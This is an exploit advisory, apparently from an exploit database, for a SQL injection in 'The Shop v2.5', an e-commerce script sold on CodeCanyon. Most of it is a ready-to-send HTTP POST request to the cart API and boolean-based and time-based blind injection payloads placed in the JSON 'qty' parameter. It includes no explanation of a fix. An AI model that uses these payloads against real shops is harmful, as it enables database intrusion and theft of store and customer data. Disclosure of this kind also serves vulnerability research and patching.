The Shop 2.5 SQL Injection

`# Exploit Title: The Shop v2.5 - SQL Injection  
# Date: 2023-06-17  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor: https://codecanyon.net/item/the-shop/34858541  
# Demo Site: https://shop.activeitzone.com  
# Tested on: Kali Linux  
# CVE: N/A  
  
  
### Request ###  
  
POST /api/v1/carts/add HTTP/1.1  
Content-Type: application/json  
Accept: application/json, text/plain, */*  
x-requested-with: XMLHttpRequest  
x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4  
Referer: https://localhost  
Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;  
the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7  
Content-Length: 81  
Accept-Encoding: gzip,deflate,br  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36  
Host: localhost  
Connection: Keep-alive  
  
{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}  
  
  
### Parameter & Payloads ###  
  
Parameter: JSON qty ((custom) POST)  
Type: boolean-based blind  
Title: Boolean-based blind - Parameter replace (original value)  
Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)  
THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)  
END))","temp_user_id":null}  
  
Type: time-based blind  
Title: MySQL > 5.0.12 OR time-based blind (heavy query)  
Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR  
2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,  
INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS  
C)","temp_user_id":null}  
  
`